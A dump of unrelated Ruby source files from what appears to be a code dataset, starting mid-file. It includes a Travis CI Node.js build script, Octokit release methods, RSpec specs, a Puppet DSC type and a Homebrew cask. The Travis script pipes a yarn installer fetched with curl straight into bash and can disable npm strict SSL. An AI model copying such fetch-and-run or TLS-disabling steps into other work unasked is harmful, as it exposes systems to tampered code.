p[228, arg.length] = arg
end
p
end
end
| 28.727273 | 84 | 0.525316 |
bf90063a033c03efcef653dfec71234e9fc7aa8f | 9,148 | module Travis
module Build
class Script
class NodeJs < Script
DEFAULT_VERSION = '0.10'
YARN_REQUIRED_NODE_VERSION = '4'
NPM_QUIET_TREE_VERSION = '5'
NPM_CI_CMD_VERSION = '5.8.0'
def export
super
if node_js_given_in_config?
sh.export 'TRAVIS_NODE_VERSION', version, echo: false
end
end
def setup
super
prepend_path './node_modules/.bin'
convert_legacy_nodejs_config
update_nvm
nvm_install
npm_disable_prefix
npm_disable_spinner
npm_disable_progress
npm_disable_strict_ssl unless npm_strict_ssl?
setup_npm_cache if use_npm_cache?
install_yarn
end
def announce
super
if iojs_3_plus?
sh.cmd 'echo -e "#include <array>\nstd::array<int, 1> arr = {0}; int main() {return 0;}" > /tmp/foo-$$.cpp', echo: false
sh.raw "if ! ($CXX -std=c++11 -o /dev/null /tmp/foo-$$.cpp >&/dev/null || g++ -std=c++11 -o /dev/null /tmp/foo-$$.cpp >&/dev/null); then"
sh.echo "Starting with io.js 3 and Node.js 4, building native extensions requires C++11-compatible compiler, which seems unavailable on this VM. Please read https://docs.travis-ci.com/user/languages/javascript-with-nodejs#Node.js-v4-(or-io.js-v3)-compiler-requirements.", ansi: :yellow
sh.raw "fi"
sh.cmd 'rm -f /tmp/foo-$$.cpp', echo: false
end
sh.cmd 'node --version'
sh.cmd 'npm --version'
sh.cmd 'nvm --version'
sh.if "-f yarn.lock" do
sh.cmd 'yarn --version'
sh.cmd 'hash -d yarn', echo: false
end
end
def install
sh.if '-f package.json' do
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
npm_install config[:npm_args]
end
sh.else do
sh.cmd "yarn", retry: true, fold: 'install'
end
end
sh.else do
npm_install config[:npm_args]
end
end
end
def script
sh.if '-f package.json' do
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
sh.cmd 'npm test'
end
sh.else do
sh.cmd 'yarn test'
end
end
sh.else do
sh.cmd 'npm test'
end
end
sh.else do
sh.cmd 'make test'
end
end
def cache_slug
super << '--node-' << version
end
def setup_cache
if data.cache?(:yarn)
sh.fold 'cache.yarn' do
sh.echo ''
directory_cache.add '$HOME/.cache/yarn'
end
end
if data.cache?(:npm)
sh.fold 'cache.npm' do
sh.echo ''
directory_cache.add '$HOME/.npm'
end
end
end
def use_directory_cache?
super || data.cache?(:yarn) || data.cache?(:npm)
end
private
def convert_legacy_nodejs_config
# TODO deprecate :nodejs
# some old projects use language: nodejs. MK.
if config[:nodejs] && !config[:node_js]
config[:node_js] = config[:nodejs]
end
end
def node_js_given_in_config?
!!config[:node_js]
end
def version
@version ||= begin
version = Array(config[:node_js]).first
version == 0.1 ? '0.10' : version.to_s
end
end
def nvm_install
if node_js_given_in_config?
use_nvm_version
else
use_nvm_default
end
end
def use_nvm_default
sh.if '-f .nvmrc' do
sh.echo "Using nodejs version from .nvmrc", ansi: :yellow
install_version '$(< .nvmrc)'
end
sh.else do
install_version DEFAULT_VERSION
end
end
def use_nvm_version
install_version version
end
def install_version(ver)
sh.fold "nvm.install" do
sh.cmd "nvm install #{ver}", assert: false, timing: true
sh.if '$? -ne 0' do
sh.echo "Failed to install #{ver}. Remote repository may not be reachable.", ansi: :red
sh.echo "Using locally available version #{ver}, if applicable."
sh.cmd "nvm use #{ver}", assert: false, timing: false
sh.if '$? -ne 0' do
sh.echo "Unable to use #{ver}", ansi: :red
sh.cmd "false", assert: true, echo: false, timing: false
end
end
sh.export 'TRAVIS_NODE_VERSION', ver, echo: false
end
end
def update_nvm
return if app_host.empty?
sh.echo "Updating nvm", ansi: :yellow, timing: false
nvm_dir = "$HOME/.nvm"
sh.raw "mkdir -p #{nvm_dir}"
sh.raw "curl -s -o #{nvm_dir}/nvm.sh https://#{app_host}/files/nvm.sh".untaint, assert: false
sh.raw "curl -s -o #{nvm_dir}/nvm-exec https://#{app_host}/files/nvm-exec".untaint, assert: false
sh.raw "chmod 0755 #{nvm_dir}/nvm.sh #{nvm_dir}/nvm-exec", assert: true
sh.raw "source #{nvm_dir}/nvm.sh", assert: false
end
def npm_disable_prefix
sh.if "$(command -v sw_vers) && -f $HOME/.npmrc" do
sh.cmd "npm config delete prefix"
end
end
def npm_disable_spinner
sh.cmd 'npm config set spin false', echo: false, timing: false
end
def npm_disable_strict_ssl
# sh.echo '### Disabling strict SSL ###', ansi: :red
sh.cmd 'echo "### Disabling strict SSL ###"'
sh.cmd 'npm conf set strict-ssl false', echo: true
end
def npm_disable_progress
sh.cmd "npm config set progress false", echo: false, timing: false
end
def npm_strict_ssl?
!node_0_6? && !node_0_8? && !node_0_9?
end
def node_0_6?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 6)
end
def node_0_8?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 8)
end
def node_0_9?
(config[:node_js] || '').to_s.split('.')[0..1] == %w(0 9)
end
def use_npm_cache?
Array(config[:cache]).include?('npm')
end
def setup_npm_cache
if data.hosts && data.hosts[:npm_cache]
sh.cmd 'npm config set registry http://registry.npmjs.org/', timing: false
sh.cmd "npm config set proxy #{data.hosts[:npm_cache]}", timing: false
end
end
def iojs_3_plus?
(config[:node_js] || '').to_s.split('.')[0].to_i >= 3
end
def npm_install(args)
sh.fold "install.npm" do
sh.if "$(vers2int `npm -v`) -ge $(vers2int #{NPM_CI_CMD_VERSION}) && (-f npm-shrinkwrap.json || -f package-lock.json)" do
sh.cmd "npm ci #{args}", retry: true
end
sh.else do
sh.cmd "npm install #{args}", retry: true
end
sh.if "$(vers2int `npm -v`) -gt $(vers2int #{NPM_QUIET_TREE_VERSION})" do
sh.cmd "npm ls", echo: true, assert: false
end
end
end
def install_yarn
sh.if "-f yarn.lock" do
sh.if yarn_req_not_met do
sh.echo "Node.js version $(node --version) does not meet requirement for yarn." \
" Please use Node.js #{YARN_REQUIRED_NODE_VERSION} or later.", ansi: :red
npm_install config[:npm_args]
end
sh.else do
sh.fold "install.yarn" do
sh.if "-z \"$(command -v yarn)\"" do
sh.if "-z \"$(command -v gpg)\"" do
sh.export "YARN_GPG", "no"
end
sh.echo "Installing yarn", ansi: :green
sh.cmd "curl -o- -L https://yarnpkg.com/install.sh | bash", echo: true, timing: true
sh.echo "Setting up \\$PATH", ansi: :green
sh.export "PATH", "$HOME/.yarn/bin:$PATH"
end
end
end
end
end
def prepend_path(path)
sh.if "$(echo :$PATH: | grep -v :#{path}:)" do
sh.export "PATH", "#{path}:$PATH", echo: true
end
end
def yarn_req_not_met
"$(vers2int $(echo `node --version` | tr -d 'v')) -lt $(vers2int #{YARN_REQUIRED_NODE_VERSION})"
end
end
end
end
end
| 32.55516 | 297 | 0.486773 |
class SupplyTeachers::GenerateBranches
  include SupplyTeachers::DataImportHelper

  attr_reader :supplier_branches

  # current_data must respond to #geographical_data_all_suppliers
  # (path of the supplier geography spreadsheet).
  def initialize(current_data)
    @current_data = current_data
  end

  # Parses the spreadsheet and groups the normalised branch rows per
  # supplier; memoised into #supplier_branches.
  def generate_branches
    @supplier_branches = collate(branches.map { |row| nest(row, :branches) })
  end

  private

  # rubocop:disable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity
  # Reads the 'Branch details' sheet and normalises every row.
  # NOTE: the original chain contained a no-op `.map { |row| row }`,
  # removed here. line_no starts at 3 because rows 1-2 are headers.
  def branches
    branches_data = []
    read_spreadsheet(@current_data.geographical_data_all_suppliers) do |branch_workbook|
      branch_sheet = branch_workbook.sheet('Branch details')
      branches_data = branch_sheet.parse(header_search: ['Supplier Name'])
                                  .map { |row| remap_headers(row, HEADER_MAP) }
                                  .map.with_index { |row, index| row.merge(line_no: index + 3) }
                                  .map { |row| convert_html_fields_to_text(row) }
                                  .map { |row| convert_float_fields_to_int(row) }
                                  .map { |row| strip_fields(row) }
                                  .map { |row| match_email_to_contacts(row) }
                                  .map { |row| strip_keys_with_null_or_empty_values(row) }
                                  .map { |row| strip_punctuation_from_postcode(row) }
    end
    branches_data
  end
  # rubocop:enable Metrics/AbcSize, Metrics/CyclomaticComplexity, Metrics/PerceivedComplexity

  # Pairs contact names with email addresses. When the counts differ we
  # cannot pair them reliably, so contacts is left empty.
  def match_email_to_contacts(row)
    names = row[:contact_name].split(%r{[,/\n]+}m)
    emails = row[:email].split(/[;\s]+/)
    contacts =
      if names.count == emails.count
        names.zip(emails).map { |name, email| { name: name, email: email } }
      else
        []
      end
    row.merge(contacts: contacts).reject { |k, _v| %i[contact_name email].include? k }
  end

  # Spreadsheet cells may contain HTML; reduce them to their text content.
  def convert_html_fields_to_text(row)
    row.transform_values { |v| v.is_a?(String) ? Capybara.string(v).text : v }
  end

  # Roo parses numeric cells as Floats; phone numbers etc. want integers.
  def convert_float_fields_to_int(row)
    row.transform_values { |v| v.is_a?(Float) ? v.to_i : v }
  end

  def strip_punctuation_from_postcode(row)
    row.merge(postcode: row[:postcode].gsub(/[^\w\s]/, ''))
  end

  def strip_keys_with_null_or_empty_values(row)
    row.reject { |_, v| v.nil? || v == '' }.to_h
  end

  # Maps spreadsheet column headings to the symbol keys used internally.
  HEADER_MAP = {
    'Supplier Name' => :supplier_name,
    'Branch Name/No.' => :branch_name,
    'Branch Contact name' => :contact_name,
    'Address 1' => :address_1,
    'Address 2' => :address_2,
    'Town' => :town,
    'County' => :county,
    'Post Code' => :postcode,
    'Branch Contact Name Email Address' => :email,
    'Branch Telephone Number' => :telephone,
    'Region' => :region,
  }.freeze
end
| 34.731707 | 96 | 0.601826 |
87ff56a78a8223e83d08d96a0da6e21cbc67c1ec | 780 | require 'spec_helper'
RSpec.describe SixSaferpay::Address do
  subject { SpinningWheel.create('address') }

  # The expected hash form, built from the subject's own attribute readers.
  let(:expected_hash) do
    {
      first_name: subject.first_name,
      last_name: subject.last_name,
      date_of_birth: subject.date_of_birth,
      company: subject.company,
      legal_form: subject.legal_form,
      street: subject.street,
      street_2: subject.street_2,
      gender: subject.gender,
      zip: subject.zip,
      city: subject.city,
      country_subdevision_code: subject.country_subdevision_code,
      country_code: subject.country_code,
      phone: subject.phone,
      email: subject.email
    }
  end

  describe 'to_hash' do
    it 'returns the hash representation of the address' do
      expect(subject.to_hash).to eq(expected_hash)
    end
  end
end
| 24.375 | 65 | 0.680769 |
395d2bce2cd4855daca6d8ed0b92183a88345813 | 2,327 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EdgeGateway::Mgmt::V2019_03_01
  module Models
    #
    # The security settings of a device.
    #
    # NOTE(review): auto-generated by AutoRest — do not hand-edit the
    # mapper; regenerate from the service specification instead.
    class SecuritySettings < ARMBaseModel

      include MsRestAzure

      # @return [AsymmetricEncryptedSecret] Device administrator password as an
      # encrypted string (encrypted using RSA PKCS #1) is used to sign into the
      # local web UI of the device. The Actual password should have at least 8
      # characters that are a combination of uppercase, lowercase, numeric,
      # and special characters.
      attr_accessor :device_admin_password


      #
      # Mapper for SecuritySettings class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'SecuritySettings',
          type: {
            name: 'Composite',
            class_name: 'SecuritySettings',
            model_properties: {
              id: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'id',
                type: {
                  name: 'String'
                }
              },
              name: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'name',
                type: {
                  name: 'String'
                }
              },
              type: {
                client_side_validation: true,
                required: false,
                read_only: true,
                serialized_name: 'type',
                type: {
                  name: 'String'
                }
              },
              # The only writable, mandatory property of this model.
              device_admin_password: {
                client_side_validation: true,
                required: true,
                serialized_name: 'properties.deviceAdminPassword',
                type: {
                  name: 'Composite',
                  class_name: 'AsymmetricEncryptedSecret'
                }
              }
            }
          }
        }
      end
    end
  end
end
| 29.833333 | 79 | 0.50795 |
6299e34cbe6c04191c1d603adb7fd52da796a2fd | 1,136 | require 'lknovel/utils'
require 'uri'
module Lknovel
  # A remote image referenced by URL. Supports downloading to disk and
  # cropping via ImageMagick's `identify`/`convert` command-line tools.
  class Image

    attr_reader :uri, :file

    # url - source URL of the image; #file is its basename (last path segment).
    def initialize(url)
      @uri = URI(url)
      @file = @uri.path.split('/').last
    end

    # Downloads the image into +dir+ unless a file of the same name already
    # exists there. Uses the retryable/openuri helpers from lknovel/utils.
    def download(dir = '.')
      target = File.join(dir, @file)
      return if File.exist?(target) # File.exists? is a deprecated alias

      File.open(target, 'wb') do |w|
        retryable do
          openuri(@uri, 'rb') do |r|
            w.write(r.read)
          end
        end
      end
    end

    # Crops the local copy of the image (in options[:dir]) into +output+
    # using the ImageMagick geometry string +operation+.
    # If a block is given it receives (width, height) — 0,0 when the size
    # could not be determined — and its truthiness decides whether to crop.
    # Returns true only when `convert` succeeded and +output+ exists.
    def crop(output, operation, options = { :dir => '.' })
      input = File.join(options[:dir], @file)
      begin
        # Block form of IO.popen closes the child pipe (the previous
        # version leaked it). `gets` may be nil if identify prints nothing.
        dim = IO.popen(['identify', '-format', '%[fx:w] %[fx:h]', input], &:gets).to_s.split
        width = dim[0].to_i
        height = dim[1].to_i
      rescue StandardError # was `rescue Exception`, which also swallowed signals/exit
        width = 0
        height = 0
      end
      need_crop = true
      need_crop = yield(width, height) if block_given?
      cropped = false
      if need_crop
        success = system('convert', input, '-crop', operation, output)
        cropped = true if success && File.exist?(output)
      end
      cropped
    end
  end
end
| 21.846154 | 73 | 0.516725 |
21cc2a570952c714df12a318966d2a30d2c2f045 | 1,613 | require 'spec_helper'
# Live integration specs: these hit the Vertpig exchange API over the
# network, so they can fail for connectivity reasons unrelated to code.
RSpec.describe 'Vertpig integration specs' do
  let(:client) { Cryptoexchange::Client.new }
  let(:vtc_eur_pair) { Cryptoexchange::Models::MarketPair.new(base: 'VTC', target: 'EUR', market: 'vertpig') }

  it 'fetch pairs' do
    pairs = client.pairs('vertpig')
    expect(pairs).not_to be_empty

    pair = pairs.first
    expect(pair.base).to_not be nil
    expect(pair.target).to_not be nil
    expect(pair.market).to eq 'vertpig'
  end

  it 'fetch ticker' do
    ticker = client.ticker(vtc_eur_pair)

    expect(ticker.base).to eq 'VTC'
    expect(ticker.target).to eq 'EUR'
    expect(ticker.market).to eq 'vertpig'
    expect(ticker.bid).to be_a Numeric
    expect(ticker.ask).to be_a Numeric
    expect(ticker.last).to be_a Numeric
    expect(ticker.high).to be_a Numeric
    expect(ticker.low).to be_a Numeric
    expect(ticker.volume).to be_a Numeric
    expect(ticker.timestamp).to be_a Numeric
    # Sanity check: the timestamp decodes to a plausible calendar year.
    expect(2000..Date.today.year).to include(Time.at(ticker.timestamp).year)
    expect(ticker.payload).to_not be nil
  end

  it 'fetch order book' do
    order_book = client.order_book(vtc_eur_pair)

    expect(order_book.base).to eq 'VTC'
    expect(order_book.target).to eq 'EUR'
    expect(order_book.market).to eq 'vertpig'
    expect(order_book.asks).to_not be_empty
    expect(order_book.bids).to_not be_empty
    expect(order_book.asks.first.price).to_not be_nil
    expect(order_book.bids.first.amount).to_not be_nil
    # Per-entry timestamps are not provided by this exchange.
    expect(order_book.bids.first.timestamp).to be_nil
    expect(order_book.timestamp).to be_a Numeric
    expect(order_book.payload).to_not be nil
  end
end
| 33.604167 | 110 | 0.719157 |
# Homebrew cask for LetterFix (Mail.app plugin for Japanese encodings).
# version is "release,build": before_comma is the release used in file
# names, after_comma is the OSDN build number used in the download path.
cask 'letterfix' do
  version '2.5.3,67423'
  sha256 'b6125a0f55ef0c52711403613473ba6fc396745f7d2ace88cc46f9d9df57b41d'

  url "http://dl.osdn.jp/letter-fix/#{version.after_comma}/LetterFix-#{version.before_comma}.dmg"
  appcast 'https://osdn.jp/projects/letter-fix/releases/rss',
          checkpoint: '8fa3a0fc1cb40fd5d73719f4e82c8857038afaa14b2d0bf2ef87649fbc46e116'
  name 'LetterFix'
  homepage 'https://osdn.jp/projects/letter-fix/'

  pkg "LetterFix-#{version.before_comma}.pkg"

  uninstall pkgutil: 'org.kuri.letterfix.LetterFix.pkg'
end
| 36.466667 | 97 | 0.773309 |
# Normalises +abbr+ (string or symbol, any case, surrounding whitespace
# allowed) to an uppercase symbol, e.g. ' ca ' -> :CA.
def get_uppercase_symbol(abbr)
  abbr.to_s.strip.upcase.to_sym
end

# Returns the state name associated with the state abbreviation abbr,
# or nil when the abbreviation is unknown.
# abbr: A two character (uppercase or lowercase) symbol or string.
# include_dc: (default: false) Whether to include Washington DC as a state.
def get_us_state_from_abbr(abbr, include_dc = false)
  abbr = get_uppercase_symbol(abbr)
  include_dc ? STATE_ABBR_WITH_DC_HASH[abbr] : STATE_ABBR_HASH[abbr]
end

# Returns whether the abbreviation is a state (optionally including
# Washington DC) abbreviation.
def us_state_abbr?(abbr, include_dc = false)
  !get_us_state_from_abbr(abbr, include_dc).nil?
end

# Frozen so the lookup tables cannot be mutated at runtime.
STATE_ABBR_HASH = {
  AL: 'Alabama',
  AK: 'Alaska',
  AZ: 'Arizona',
  AR: 'Arkansas',
  CA: 'California',
  CO: 'Colorado',
  CT: 'Connecticut',
  DE: 'Delaware',
  FL: 'Florida',
  GA: 'Georgia',
  HI: 'Hawaii',
  ID: 'Idaho',
  IL: 'Illinois',
  IN: 'Indiana',
  IA: 'Iowa',
  KS: 'Kansas',
  KY: 'Kentucky',
  LA: 'Louisiana',
  ME: 'Maine',
  MD: 'Maryland',
  MA: 'Massachusetts',
  MI: 'Michigan',
  MN: 'Minnesota',
  MS: 'Mississippi',
  MO: 'Missouri',
  MT: 'Montana',
  NE: 'Nebraska',
  NV: 'Nevada',
  NH: 'New Hampshire',
  NJ: 'New Jersey',
  NM: 'New Mexico',
  NY: 'New York',
  NC: 'North Carolina',
  ND: 'North Dakota',
  OH: 'Ohio',
  OK: 'Oklahoma',
  OR: 'Oregon',
  PA: 'Pennsylvania',
  RI: 'Rhode Island',
  SC: 'South Carolina',
  SD: 'South Dakota',
  TN: 'Tennessee',
  TX: 'Texas',
  UT: 'Utah',
  VT: 'Vermont',
  VA: 'Virginia',
  WA: 'Washington',
  WV: 'West Virginia',
  WI: 'Wisconsin',
  WY: 'Wyoming',
}.freeze

STATE_ABBR_WITH_DC_HASH = STATE_ABBR_HASH.merge(DC: 'Washington DC').freeze
| 23.364865 | 75 | 0.665124 |
0821d90daa29398f1561ef669f1acda59faf590f | 206 | ActionController::Routing::Routes.draw do |map|
map.namespace('registry') do |registry|
registry.root :controller => 'registry'
registry.connect ':action/:id', :controller => 'registry'
end
end
| 29.428571 | 61 | 0.703883 |
7a875f2059b390449524d7f20d8d0616d1dc4212 | 6,353 | require 'pathname'
# NOTE(review): auto-generated from the DSC resource's MOF schema — do
# not hand-edit; regenerate instead. Comments below only annotate.
Puppet::Type.newtype(:dsc_xaddomaincontroller) do
  require Pathname.new(__FILE__).dirname + '../../' + 'puppet/type/base_dsc'
  require Pathname.new(__FILE__).dirname + '../../puppet_x/puppetlabs/dsc_type_helpers'


  @doc = %q{
    The DSC xADDomainController resource type.
    Automatically generated from
    'xActiveDirectory/DSCResources/MSFT_xADDomainController/MSFT_xADDomainController.schema.mof'

    To learn more about PowerShell Desired State Configuration, please
    visit https://technet.microsoft.com/en-us/library/dn249912.aspx.

    For more information about built-in DSC Resources, please visit
    https://technet.microsoft.com/en-us/library/dn249921.aspx.

    For more information about xDsc Resources, please visit
    https://github.com/PowerShell/DscResources.
  }

  # dsc_domainname is the only mandatory property of this resource.
  validate do
      fail('dsc_domainname is a required attribute') if self[:dsc_domainname].nil?
    end

  def dscmeta_resource_friendly_name; 'xADDomainController' end
  def dscmeta_resource_name; 'MSFT_xADDomainController' end
  def dscmeta_module_name; 'xActiveDirectory' end
  def dscmeta_module_version; '2.24.0.0' end

  newparam(:name, :namevar => true ) do
  end

  ensurable do
    newvalue(:exists?) { provider.exists? }
    newvalue(:present) { provider.create }
    defaultto { :present }
  end

  # Name:         PsDscRunAsCredential
  # Type:         MSFT_Credential
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_psdscrunascredential) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "PsDscRunAsCredential"
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("Credential", value)
    end
    munge do |value|
      PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
    end
  end

  # Name:         DomainName
  # Type:         string
  # IsMandatory:  True
  # Values:       None
  newparam(:dsc_domainname) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "DomainName - The FQDN of the domain the Domain Controller will be joining."
    isrequired
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         DomainAdministratorCredential
  # Type:         MSFT_Credential
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_domainadministratorcredential) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "DomainAdministratorCredential - The 'PSCredential' object containing Domain Adminstrator rights to add the Domain Controller to the domain."
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("DomainAdministratorCredential", value)
    end
    munge do |value|
      PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
    end
  end

  # Name:         SafemodeAdministratorPassword
  # Type:         MSFT_Credential
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_safemodeadministratorpassword) do
    def mof_type; 'MSFT_Credential' end
    def mof_is_embedded?; true end
    desc "SafemodeAdministratorPassword - The 'PSCredential' object containing the password to use for DSRM."
    validate do |value|
      unless value.kind_of?(Hash)
        fail("Invalid value '#{value}'. Should be a hash")
      end
      PuppetX::Dsc::TypeHelpers.validate_MSFT_Credential("SafemodeAdministratorPassword", value)
    end
    munge do |value|
      PuppetX::Dsc::TypeHelpers.munge_sensitive_hash!(value)
    end
  end

  # Name:         DatabasePath
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_databasepath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "DatabasePath - The path where the database will be stored."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         LogPath
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_logpath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "LogPath - The path where the logs will be stored."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         SysvolPath
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_sysvolpath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "SysvolPath - The path where the Sysvol will be stored."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         SiteName
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_sitename) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "SiteName - The name of the site this Domain Controller will be added to."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Name:         InstallationMediaPath
  # Type:         string
  # IsMandatory:  False
  # Values:       None
  newparam(:dsc_installationmediapath) do
    def mof_type; 'string' end
    def mof_is_embedded?; false end
    desc "InstallationMediaPath - The path of the media you want to use install the Domain Controller."
    validate do |value|
      unless value.kind_of?(String)
        fail("Invalid value '#{value}'. Should be a string")
      end
    end
  end

  # Hooks DSC reboot ordering into Puppet's relationship graph.
  def builddepends
    pending_relations = super()
    PuppetX::Dsc::TypeHelpers.ensure_reboot_relationship(self, pending_relations)
  end
end
# Default PowerShell-based provider for this DSC type; confined to hosts
# running PowerShell/WMF >= 5.0.10586.117 and defaulted on Windows.
Puppet::Type.type(:dsc_xaddomaincontroller).provide :powershell, :parent => Puppet::Type.type(:base_dsc).provider(:powershell) do
  confine :true => (Gem::Version.new(Facter.value(:powershell_version)) >= Gem::Version.new('5.0.10586.117'))
  defaultfor :operatingsystem => :windows

  mk_resource_methods
end
| 31.450495 | 150 | 0.677947 |
396001390e6a66570272b1ac0d5760151082b629 | 7,953 | # frozen_string_literal: true
module Octokit
  class Client
    # Methods for the ReposReleases API
    #
    # @see https://developer.github.com/v3/repos/releases/
    module ReposReleases
      # Fetch a single release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param release_id [Integer] The ID of the release
      # @return [Sawyer::Resource] A single release
      # @see https://developer.github.com/v3/repos/releases/#get-a-release
      def release(repo, release_id, options = {})
        get("#{Repository.path(repo)}/releases/#{release_id}", options)
      end

      # List all releases of a repository.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @return [Array<Sawyer::Resource>] A list of releases
      # @see https://developer.github.com/v3/repos/releases/#list-releases
      def releases(repo, options = {})
        paginate("#{Repository.path(repo)}/releases", options)
      end

      # Create a new release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param tag_name [String] The name of the tag.
      # @option options [String] :target_commitish Commitish the tag is created from if it does not exist yet. Default: the repository's default branch.
      # @option options [String] :name The name of the release.
      # @option options [String] :body Text describing the contents of the tag.
      # @option options [Boolean] :draft true to create a draft (unpublished) release.
      # @option options [Boolean] :prerelease true to mark the release as a prerelease.
      # @return [Sawyer::Resource] The new release
      # @see https://developer.github.com/v3/repos/releases/#create-a-release
      def create_release(repo, tag_name, options = {})
        post("#{Repository.path(repo)}/releases", options.merge(tag_name: tag_name))
      end

      # Update an existing release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param release_id [Integer] The ID of the release
      # @option options [String] :tag_name The name of the tag.
      # @option options [String] :target_commitish Commitish the tag is created from if it does not exist yet.
      # @option options [String] :name The name of the release.
      # @option options [String] :body Text describing the contents of the tag.
      # @option options [Boolean] :draft true makes the release a draft, false publishes it.
      # @option options [Boolean] :prerelease true to mark the release as a prerelease.
      # @return [Sawyer::Resource] The updated release
      # @see https://developer.github.com/v3/repos/releases/#update-a-release
      def update_release(repo, release_id, options = {})
        patch("#{Repository.path(repo)}/releases/#{release_id}", options)
      end

      # Delete a release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param release_id [Integer] The ID of the release
      # @return [Boolean] True on success, false otherwise
      # @see https://developer.github.com/v3/repos/releases/#delete-a-release
      def delete_release(repo, release_id, options = {})
        boolean_from_response(:delete, "#{Repository.path(repo)}/releases/#{release_id}", options)
      end

      # Fetch the latest published release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @return [Sawyer::Resource] The latest release
      # @see https://developer.github.com/v3/repos/releases/#get-the-latest-release
      def latest_release(repo, options = {})
        get("#{Repository.path(repo)}/releases/latest", options)
      end

      # Fetch a single release asset.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param asset_id [Integer] The ID of the asset
      # @return [Sawyer::Resource] A single asset
      # @see https://developer.github.com/v3/repos/releases/#get-a-release-asset
      def release_asset(repo, asset_id, options = {})
        get("#{Repository.path(repo)}/releases/assets/#{asset_id}", options)
      end

      # List the assets attached to a release.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param release_id [Integer] The ID of the release
      # @return [Array<Sawyer::Resource>] A list of assets
      # @see https://developer.github.com/v3/repos/releases/#list-release-assets
      def release_assets(repo, release_id, options = {})
        paginate("#{Repository.path(repo)}/releases/#{release_id}/assets", options)
      end

      # Upload a release asset.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param release_id [Integer] The ID of the release
      # @param data [String, #read] Path to the file, or an IO-like object
      # @option options [String] :name The name of the asset (defaults to the file's basename)
      # @option options [String] :label The label of the asset
      # @return [Sawyer::Resource] The new asset
      # @see https://developer.github.com/v3/repos/releases/#upload-a-release-asset
      def upload_release_asset(repo, release_id, data, options = {})
        file = data.respond_to?(:read) ? data : File.new(data, 'rb')
        unless options[:content_type]
          begin
            # mime-types is an optional dependency, loaded lazily.
            require 'mime/types'
            detected = MIME::Types.type_for(file.path).first
            options[:content_type] = detected.content_type if detected
          rescue LoadError
            msg = 'Please pass content_type or install mime-types gem to guess content type from file'
            raise Octokit::MissingContentType, msg
          end
        end
        name = options[:name] || File.basename(file.path)

        upload_url = release(repo, release_id).rels[:upload].href_template.expand(name: name)

        request(:post, upload_url, file.read, parse_query_and_convenience_headers(options))
      ensure
        # Note: also closes IO objects the caller passed in.
        file&.close
      end

      # Update a release asset's metadata.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param asset_id [Integer] The ID of the asset
      # @option options [String] :name The file name of the asset.
      # @option options [String] :label An alternate short description of the asset.
      # @return [Sawyer::Resource] The updated asset
      # @see https://developer.github.com/v3/repos/releases/#update-a-release-asset
      def update_release_asset(repo, asset_id, options = {})
        patch("#{Repository.path(repo)}/releases/assets/#{asset_id}", options)
      end

      # Delete a release asset.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param asset_id [Integer] The ID of the asset
      # @return [Boolean] True on success, false otherwise
      # @see https://developer.github.com/v3/repos/releases/#delete-a-release-asset
      def delete_release_asset(repo, asset_id, options = {})
        boolean_from_response(:delete, "#{Repository.path(repo)}/releases/assets/#{asset_id}", options)
      end

      # Fetch a release by its tag name.
      #
      # @param repo [Integer, String, Repository, Hash] A GitHub repository
      # @param tag [String] The tag of the release
      # @return [Sawyer::Resource] A single release
      # @see https://developer.github.com/v3/repos/releases/#get-a-release-by-tag-name
